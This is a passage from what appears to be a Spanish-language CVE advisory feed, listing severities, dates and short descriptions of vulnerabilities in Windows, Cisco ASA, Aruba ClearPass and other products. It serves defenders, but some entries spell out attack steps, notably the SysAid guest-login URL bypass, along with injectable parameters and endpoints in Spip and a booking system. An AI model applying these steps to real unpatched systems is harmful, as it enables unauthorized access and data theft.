    Se ha detectado que SolarView Compact versión 6.00, contiene una vulnerabilidad de inyección de comandos por medio del archivo conf_mail.php
  • CVE-2021-39670
    Severidad: MEDIA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    En la función setStream del archivo WallpaperManager.java, se presenta una posible forma de causar un DoS permanente debido a una comprobación de entrada inapropiada. Esto podría conllevar a una denegación de servicio local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-12 Android-12L, ID de Android: A-204087139
  • CVE-2022-23267
    Severidad: MEDIA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Denegación de Servicio en .NET y Visual Studio. Este ID de CVE es diferente de CVE-2022-29117, CVE-2022-29145
  • CVE-2022-29538
    Severidad: MEDIA
    Fecha de publicación: 12/05/2022
    Fecha de última actualización: 08/08/2023
    RESI Gemini-Net Web versión 4.2 , está afectado por un control de acceso inapropiado en la lógica de autorización. Un usuario no autenticado puede acceder a algunos recursos críticos
  • CVE-2022-29117
    Severidad: MEDIA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Denegación de Servicio en .NET y Visual Studio. Este ID de CVE es diferente de CVE-2022-23267, CVE-2022-29145
  • CVE-2021-26813
    Severidad: MEDIA
    Fecha de publicación: 03/03/2021
    Fecha de última actualización: 08/08/2023
    markdown2 versiones anteriores a 1.0.1.18, corregido en 2.4.0, está afectado por una vulnerabilidad de denegación de servicio de expresión regular. Si un atacante proporciona una cadena maliciosa, puede dificultar el procesamiento de Markdown2 o retrasarlo durante un período de tiempo prolongado
  • CVE-2014-3393
    Severidad: MEDIA
    Fecha de publicación: 10/10/2014
    Fecha de última actualización: 15/08/2023
    El Framework de la personalización de portales Clientless SSL VPN en Cisco ASA Software 8.2 anterior a 8.2(5.51), 8.3 anterior a 8.3(2.42), 8.4 anterior a 8.4(7.23), 8.6 anterior a 8.6(1.14), 9.0 anterior a 9.0(4.24), 9.1 anterior a 9.1(5.12), y 9.2 anterior a 9.2(2.4) no implementa debidamente la autenticación, lo que permite a atacantes remotos modificar objetos de personalización RAMFS a través de vectores no especificados, tal y como fue demostrado mediante la inserción de secuencias XSS o la captura de credenciales, también conocido como Bug ID CSCup36829.
  • CVE-2014-3392
    Severidad: ALTA
    Fecha de publicación: 10/10/2014
    Fecha de última actualización: 15/08/2023
    El portal Clientless SSL VPN en Cisco ASA Software 8.2 anterior a 8.2(5.51), 8.3 anterior a 8.3(2.42), 8.4 anterior a 8.4(7.23), 8.6 anterior a 8.6(1.15), 9.0 anterior a 9.0(4.24), 9.1 anterior a 9.1(5.12), 9.2 anterior a 9.2(2.8), y 9.3 anterior a 9.3(1.1) permite a atacantes remotos obtener información sensible de la memoria de procesos o modificar los contenidos de la memoria a través de parámetros manipulados, también conocido como Bug ID CSCuq29136.
  • CVE-2022-23705
    Severidad: MEDIA
    Fecha de publicación: 09/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha identificado una vulnerabilidad de seguridad en las matrices HPE Nimble Storage Hybrid Flash, las matrices HPE Nimble Storage All Flash y las matrices HPE Nimble Storage Secondary Flash que podría permitir una carga, pero no una ejecución, de binarios de actualización no autorizados en la matriz. HPE ha realizado las siguientes actualizaciones de software para resolver la vulnerabilidad en HPE Nimble Storage: versiones 5.0.10.100 o posteriores, versiones 5.2.1.0 o posteriores, versiones 6.0.0.100 o posteriores
  • CVE-2022-21833
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios de Virtual Machine IDE Drive
  • CVE-2022-21834
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows User-mode Driver
  • CVE-2022-21835
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Microsoft Cryptographic Services
  • CVE-2022-21843
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Denegación de Servicio en Windows IKE Extension. Este ID de CVE es diferente de CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890
  • CVE-2022-21847
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Denegación de Servicio en Windows Hyper-V
  • CVE-2022-21848
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Denegación de Servicio en Windows IKE Extension. Este ID de CVE es diferente de CVE-2022-21843, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890
  • CVE-2022-21852
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows DWM Core Library. Este ID de CVE es diferente de CVE-2022-21896, CVE-2022-21902
  • CVE-2022-21857
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Active Directory Domain Services
  • CVE-2022-21858
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Bind Filter Driver
  • CVE-2022-21859
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Accounts Control
  • CVE-2022-21860
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows AppContracts API Server
  • CVE-2022-21861
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Task Flow Data Engine
  • CVE-2022-21862
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Application Model Core API
  • CVE-2022-21863
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios de Windows StateRepository API Server file
  • CVE-2022-21864
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows UI Immersive Server API
  • CVE-2022-21865
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Connected Devices Platform Service
  • CVE-2022-21866
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows System Launcher
  • CVE-2022-21867
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Push Notifications Apps
  • CVE-2022-21868
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Devices Human Interface
  • CVE-2022-21869
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Clipboard User Service
  • CVE-2022-21870
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Tablet Windows User Interface Application Core
  • CVE-2022-21871
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Microsoft Diagnostics Hub Standard Collector Runtime
  • CVE-2022-21872
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Event Tracing
  • CVE-2022-21873
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Tile Data Repository
  • CVE-2022-21874
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota en Windows Security Center API
  • CVE-2022-21875
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Storage
  • CVE-2022-21878
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota en Windows Geolocation Service
  • CVE-2022-21879
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Kernel. Este ID de CVE es diferente de CVE-2022-21881
  • CVE-2022-21880
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información en Windows GDI+. Este ID de CVE es diferente de CVE-2022-21915
  • CVE-2022-21881
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Kernel. Este ID de CVE es diferente de CVE-2022-21879
  • CVE-2022-21928
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota en Windows Resilient File System (ReFS). Este ID de CVE es diferente de CVE-2022-21892, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963
  • CVE-2022-21971
    Severidad: ALTA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Ejecución de Código Remota en Windows Runtime
  • CVE-2022-21981
    Severidad: MEDIA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows Common Log File System Driver. Este ID de CVE es diferente de CVE-2022-22000
  • CVE-2022-21985
    Severidad: BAJA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Divulgación de Información en Windows Remote Access Connection Manager
  • CVE-2022-21989
    Severidad: MEDIA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows Kernel
  • CVE-2022-21993
    Severidad: ALTA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Divulgación de Información en Windows Services for NFS ONCRPC XDR Driver
  • CVE-2022-21994
    Severidad: ALTA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows DWM Core Library
  • CVE-2022-21997
    Severidad: BAJA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-21999, CVE-2022-22717, CVE-2022-22718
  • CVE-2022-21998
    Severidad: MEDIA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Divulgación de Información en Windows Common Log File System Driver
  • CVE-2022-22000
    Severidad: ALTA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows Common Log File System Driver. Este ID de CVE es diferente de CVE-2022-21981
  • CVE-2022-22001
    Severidad: ALTA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows Remote Access Connection Manager
  • CVE-2022-22002
    Severidad: MEDIA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Denegación de Servicio en Windows User Account Profile Picture
  • CVE-2022-22710
    Severidad: MEDIA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Denegación de Servicio en Windows Common Log File System Driver
  • CVE-2022-22712
    Severidad: MEDIA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Denegación de Servicio en Windows Hyper-V
  • CVE-2022-22713
    Severidad: BAJA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Denegación de Servicio en Windows Hyper-V
  • CVE-2022-22715
    Severidad: ALTA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Named Pipe File
  • CVE-2022-22717
    Severidad: MEDIA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-21997, CVE-2022-21999, CVE-2022-22718
  • CVE-2022-22718
    Severidad: ALTA
    Fecha de publicación: 09/02/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-21997, CVE-2022-21999, CVE-2022-22717
  • CVE-2022-23284
    Severidad: ALTA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Print Spooler
  • CVE-2022-23286
    Severidad: MEDIA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Cloud Files Mini Filter Driver
  • CVE-2022-23287
    Severidad: MEDIA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows ALPC. Este ID de CVE es diferente de CVE-2022-23283, CVE-2022-24505
  • CVE-2022-23288
    Severidad: MEDIA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows DWM Core Library. Este ID de CVE es diferente de CVE-2022-23291
  • CVE-2022-23290
    Severidad: ALTA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Inking COM
  • CVE-2022-23291
    Severidad: ALTA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows DWM Core Library. Este ID de CVE es diferente de CVE-2022-23288
  • CVE-2022-23293
    Severidad: ALTA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Fast FAT File System Driver
  • CVE-2022-23298
    Severidad: MEDIA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows NT OS Kernel
  • CVE-2022-23299
    Severidad: ALTA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows PDEV
  • CVE-2022-24454
    Severidad: ALTA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Security Support Provider Interface
  • CVE-2022-24459
    Severidad: ALTA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Fax and Scan Service
  • CVE-2022-24460
    Severidad: ALTA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Tablet Windows User Interface Application
  • CVE-2022-24503
    Severidad: MEDIA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de Remote Desktop Protocol Client
  • CVE-2022-26913
    Severidad: MEDIA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Omisión de Funciones de Seguridad de Windows Authentication
  • CVE-2022-26939
    Severidad: MEDIA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Storage Spaces Direct. Este ID de CVE es diferente de CVE-2022-26932, CVE-2022-26938
  • CVE-2022-29102
    Severidad: MEDIA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de Windows Failover Cluster
  • CVE-2022-29114
    Severidad: BAJA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-29140
  • CVE-2022-29115
    Severidad: MEDIA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota en Windows Fax Service
  • CVE-2022-29120
    Severidad: MEDIA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de Windows Clustered Shared Volume. Este ID de CVE es diferente de CVE-2022-29122, CVE-2022-29123, CVE-2022-29134
  • CVE-2022-29122
    Severidad: BAJA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de Windows Clustered Shared Volume. Este ID de CVE es diferente de CVE-2022-29120, CVE-2022-29123, CVE-2022-29134
  • CVE-2022-29123
    Severidad: BAJA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de Windows Clustered Shared Volume. Este ID de CVE es diferente de CVE-2022-29120, CVE-2022-29122, CVE-2022-29134
  • CVE-2022-29125
    Severidad: MEDIA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Push Notifications Apps
  • Vulnerabilidad en Win32k de Microsoft (CVE-2021-40449)
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Win32k . Este ID de CVE es diferente de CVE-2021-40450, CVE-2021-41357
  • CVE-2021-40462
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Ejecución de Código Remota en Windows Media Foundation Dolby Digital Atmos Decoders
  • CVE-2021-40464
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Nearby Sharing
  • CVE-2021-40465
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Ejecución de Código Remota en Windows Text Shaping
  • CVE-2021-43215
    Severidad: MEDIA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de corrupción de memoria de iSNS Server puede conllevar a una Ejecución de Código Remota
  • CVE-2021-43222
    Severidad: MEDIA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de Microsoft Message Queuing Este ID de CVE es diferente de CVE-2021-43236
  • CVE-2021-43224
    Severidad: BAJA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de Windows Common Log File System Driver
  • CVE-2021-43227
    Severidad: BAJA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de Storage Spaces Controller. Este ID de CVE es diferente de CVE-2021-43235
  • CVE-2021-43235
    Severidad: BAJA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de Storage Spaces Controller. Este ID de CVE es diferente de CVE-2021-43227
  • CVE-2022-22798
    Severidad: ALTA
    Fecha de publicación: 12/05/2022
    Fecha de última actualización: 08/08/2023
    Sysaid - Pro Plus Edition, SysAid Help Desk Broken Access Control versiones v20.4.74 b10, v22.1.20 b62, v22.1.30 b49 - Un atacante necesita iniciar sesión como invitado, después de lo cual el sistema lo redirige al portal de servicios o EndUserPortal.JSP, luego necesita cambiar la ruta en la URL a /ConcurrentLogin%2ejsp, después de lo cual recibirá un mensaje de error con un botón de inicio de sesión, al hacer clic en él, será conectado al tablero del sistema. El atacante puede recibir datos confidenciales como detalles del servidor, nombres de usuario, estaciones de trabajo, etc. También puede llevar a cabo acciones como la carga de archivos o la eliminación de llamadas del sistema
  • CVE-2022-21131
    Severidad: BAJA
    Fecha de publicación: 12/05/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado para algunos procesadores Intel(R) Xeon(R) puede permitir que un usuario autenticado permita potencialmente una divulgación de información por medio del acceso local
  • CVE-2022-21128
    Severidad: MEDIA
    Fecha de publicación: 12/05/2022
    Fecha de última actualización: 08/08/2023
    Una administración insuficiente del flujo de control en el software Intel(R) Advisor versiones anteriores a 7.6.0.37 puede permitir que un usuario autenticado permita potencialmente una escalada de privilegios por medio del acceso local
  • CVE-2022-22325
    Severidad: BAJA
    Fecha de publicación: 13/05/2022
    Fecha de última actualización: 08/08/2023
    IBM MQ (IBM MQ para HPE NonStop versión 8.1.0) puede divulgar inadvertidamente información confidencial en determinadas circunstancias a un usuario local a partir de un seguimiento de pila. IBM X-Force ID: 218853
  • CVE-2021-27291
    Severidad: MEDIA
    Fecha de publicación: 17/03/2021
    Fecha de última actualización: 08/08/2023
    En pygments versión 1.1+, corregido en 2.7.4, los lexers usados para analizar unos lenguajes de programación dependen en gran medida en expresiones regulares. Algunas de las expresiones regulares presentan una complejidad exponencial o cúbica en el peor de los casos y son vulnerables a ReDoS. Al diseñar una entrada maliciosa, un atacante puede causar una denegación de servicio
  • CVE-2022-25865
    Severidad: ALTA
    Fecha de publicación: 13/05/2022
    Fecha de última actualización: 08/08/2023
    El paquete workspace-tools versiones anteriores a 0.18.4, es vulnerable a una inyección de comandos por medio de la inyección de argumentos de git. Cuando es llamada a una función fetchRemoteBranch(remote: string, remoteBranch: string, cwd: string), los parámetros remote y remoteBranch pasan al subcomando git fetch de forma que pueden establecerse flags adicionales. Los flags adicionales pueden usarse para llevar a cabo una inyección de comandos
  • CVE-2022-28937
    Severidad: MEDIA
    Fecha de publicación: 15/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que FISCO-BCOS versión 3.0.0-rc2, contiene un problema por el que un nodo malicioso, por medio de una propuesta con un encabezado no válido, causará que los nodos normales dejen de producir nuevos bloques y de procesar las peticiones de los nuevos clientes
  • CVE-2022-29121
    Severidad: BAJA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Denegación de Servicio en Windows WLAN AutoConfig Service
  • CVE-2021-33318
    Severidad: ALTA
    Fecha de publicación: 16/05/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de comprobación de entrada en los paquetes C# de Joel Christner .NET WatsonWebserver, IpMatcher 1.0.4.1 y anteriores (IpMatcher) y 4.1.3 y anteriores (WatsonWebserver) debido a la insuficiente comprobación de las direcciones IP y máscaras de red de entrada con respecto a la lista interna de direcciones IP y subredes de Matcher
  • CVE-2022-23657
    Severidad: ALTA
    Fecha de publicación: 16/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de omisión de autenticación remota en Aruba ClearPass Policy Manage versiones: 6.10.4 y anteriores, 6.9.9 y anteriores, 6.8.9-HF2 y anteriores, 6.7.x y anteriores. Aruba ha publicado actualizaciones de ClearPass Policy Manager que abordan esta vulnerabilidad de seguridad
  • CVE-2022-23658
    Severidad: ALTA
    Fecha de publicación: 16/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de omisión de autenticación remota en Aruba ClearPass Policy Manager versiones: 6.10.4 y anteriores, 6.9.9 y anteriores, 6.8.9-HF2 y anteriores, 6.7.x y anteriores. Aruba ha publicado actualizaciones de ClearPass Policy Manager que abordan esta vulnerabilidad de seguridad
  • CVE-2022-23660
    Severidad: ALTA
    Fecha de publicación: 16/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de omisión de autenticación remota en Aruba ClearPass Policy Manager versiones: 6.10.4 y anteriores, 6.9.9 y anteriores, 6.8.9-HF2 y anteriores, 6.7.x y anteriores. Aruba ha publicado actualizaciones de ClearPass Policy Manager que abordan esta vulnerabilidad de seguridad
  • CVE-2019-12677
    Severidad: MEDIA
    Fecha de publicación: 02/10/2019
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la funcionalidad VPN Secure Sockets Layer (SSL) del Software Cisco Adaptive Security Appliance (ASA), podría permitir a un atacante remoto autenticado causar una condición de denegación de servicio (DoS) que impide la creación de nuevas conexiones SSL/Transport Layer Security (TLS) en un dispositivo afectado. La vulnerabilidad es debido al manejo incorrecto de las cadenas codificadas en Base64. Un atacante podría explotar esta vulnerabilidad al abrir muchas sesiones VPN SSL en un dispositivo afectado. El atacante necesitaría tener credenciales de usuario válidas sobre el dispositivo afectado para explotar esta vulnerabilidad. Una explotación con éxito podría permitir al atacante sobrescribir una ubicación especial de memoria del sistema, lo que eventualmente resulta en errores de asignación de memoria para nuevas sesiones SSL/TLS en el dispositivo, impidiendo el establecimiento con éxito de estas sesiones. Se requiere una recarga del dispositivo para recuperarse de esta condición. Las conexiones SSL/TLS establecidas en el dispositivo y las conexiones SSL/TLS por medio del dispositivo no están afectadas. Nota: Aunque esta vulnerabilidad se encuentra en la funcionalidad VPN SSL, la explotación con éxito de esta vulnerabilidad afectaría todas las nuevas sesiones SSL/TLS en el dispositivo, incluidas las sesiones de administración.
  • CVE-2022-29539
    Severidad: ALTA
    Fecha de publicación: 12/05/2022
    Fecha de última actualización: 08/08/2023
    resi-calltrace en RESI Gemini-Net versión 4.2, está afectado por la inyección de comandos del Sistema Operativo. No comprueba apropiadamente los parámetros enviados como entrada antes de ser procesados en el servidor. Debido a una falta de comprobación de la entrada del usuario, un atacante no autenticado puede omitir la sintaxis prevista por el software (por ejemplo, concatenar comandos "&|;\r) e inyectar comandos arbitrarios del sistema con los privilegios del usuario de la aplicación
  • CVE-2016-1445
    Severidad: MEDIA
    Fecha de publicación: 11/07/2016
    Fecha de última actualización: 15/08/2023
    Cisco Adaptive Security Appliance (ASA) Software 8.2 hasta la versión 9.4.3.3 permite a atacantes remotos eludir el ICMP Echo Reply ACLs previsto a través de vectores relacionados con los subtipos.
  • CVE-2022-30688
    Severidad: MEDIA
    Fecha de publicación: 17/05/2022
    Fecha de última actualización: 08/08/2023
    needrestart versiones 0.8 hasta 3.5 anteriores a 3.6, es propenso a una escalada de privilegios local. Las remezclas para detectar los intérpretes de Perl, Python y Ruby no están ancladas, lo que permite a un usuario local escalar privilegios cuando needrestart intenta detectar si los intérpretes están usando archivos fuente antiguos
  • CVE-2022-23673
    Severidad: ALTA
    Fecha de publicación: 17/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de inyección de comandos remotos autenticados en Aruba ClearPass Policy Manager versiones 6.10.4 y anteriores, 6.9.9 y anteriores, 6.8.9-HF2 y anteriores, 6.7.x y anteriores. Aruba ha publicado actualizaciones de ClearPass Policy Manager que abordan esta vulnerabilidad de seguridad
  • CVE-2022-23672
    Severidad: ALTA
    Fecha de publicación: 17/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de inyección de comandos remotos autenticados en Aruba ClearPass Policy Manager versiones 6.10.4 y anteriores, 6.9.9 y anteriores, 6.8.9-HF2 y anteriores, 6.7.x y anteriores. Aruba ha publicado actualizaciones de ClearPass Policy Manager que abordan esta vulnerabilidad de seguridad
  • CVE-2022-28617
    Severidad: ALTA
    Fecha de publicación: 17/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de omisión remota de las restricciones de seguridad en HPE OneView versiones anteriores a 7.0. HPE ha proporcionado una actualización de software para resolver esta vulnerabilidad en HPE OneView
  • CVE-2022-23671
    Severidad: MEDIA
    Fecha de publicación: 17/05/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de divulgación de información autenticada remota en Aruba ClearPass Policy Manager versiones 6.10.4 y anteriores, 6.9.9 y anteriores, 6.8.9-HF2 y anteriores, 6.7.x y anteriores. Aruba ha publicado actualizaciones de ClearPass Policy Manager que abordan esta vulnerabilidad de seguridad
  • CVE-2022-28960
    Severidad: MEDIA
    Fecha de publicación: 19/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de inyección PHP en Spip versiones anteriores a v3.2.8, permite a atacantes ejecutar código PHP arbitrario por medio del parámetro _oups en /ecrire
  • CVE-2022-29652
    Severidad: MEDIA
    Fecha de publicación: 19/05/2022
    Fecha de última actualización: 08/08/2023
    Online Sports Complex Booking System versión 1.0, es vulnerable a una Inyección SQL por medio de /scbs/classes/Users.php?f=save_client
  • CVE-2022-29587
    Severidad: MEDIA
    Fecha de publicación: 16/05/2022
    Fecha de última actualización: 08/08/2023
    Los dispositivos bizhub MFP de Konica Minolta versiones anteriores a 14-04-2022, presentan un navegador interno Chromium que es ejecutado con privilegios de acceso root (también se conoce como super usuario)
  • CVE-2022-29639
    Severidad: ALTA
    Fecha de publicación: 18/05/2022
    Fecha de última actualización: 08/08/2023
